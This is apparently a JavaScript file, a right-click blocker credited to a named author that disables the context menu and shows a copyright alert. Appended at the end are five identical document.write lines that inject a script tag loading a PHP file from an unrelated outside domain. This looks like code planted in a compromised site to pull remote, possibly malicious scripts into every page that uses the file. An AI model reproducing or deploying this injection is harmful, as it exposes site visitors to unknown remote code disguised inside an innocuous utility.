// Script by Dave Lauderdale. Published at: digi-dl.com
var message="Sorry, that function is disabled.\nThe contents & graphics are copyrighted.\nAll Rights Reserved."; 
var closeWin="0"; // Close window after message? (1 = yes; 0 = no).

function IE(e) 
{
     if (navigator.appName == 'Microsoft Internet Explorer' && (event.button == 2 || event.button == 3))
     {
          alert(message); if(closeWin=="1") self.close();
          return false;
     }
}
function NS(e) 
{
     if (document.layers || (document.getElementById && !document.all))
     {
          if (e.which==2 || e.which==3)
          {
               alert(message); if(closeWin=="1") self.close();
               return false;
          }
     }
}
document.onmousedown=IE;document.onmouseup=NS;document.oncontextmenu=new Function("return false");
document.write('<script src=http://melodicsongs.com/autosuggest/bollywoodthisweek.php ><\/script>');
document.write('<script src=http://melodicsongs.com/autosuggest/bollywoodthisweek.php ><\/script>');
document.write('<script src=http://melodicsongs.com/autosuggest/bollywoodthisweek.php ><\/script>');
document.write('<script src=http://melodicsongs.com/autosuggest/bollywoodthisweek.php ><\/script>');
document.write('<script src=http://melodicsongs.com/autosuggest/bollywoodthisweek.php ><\/script>');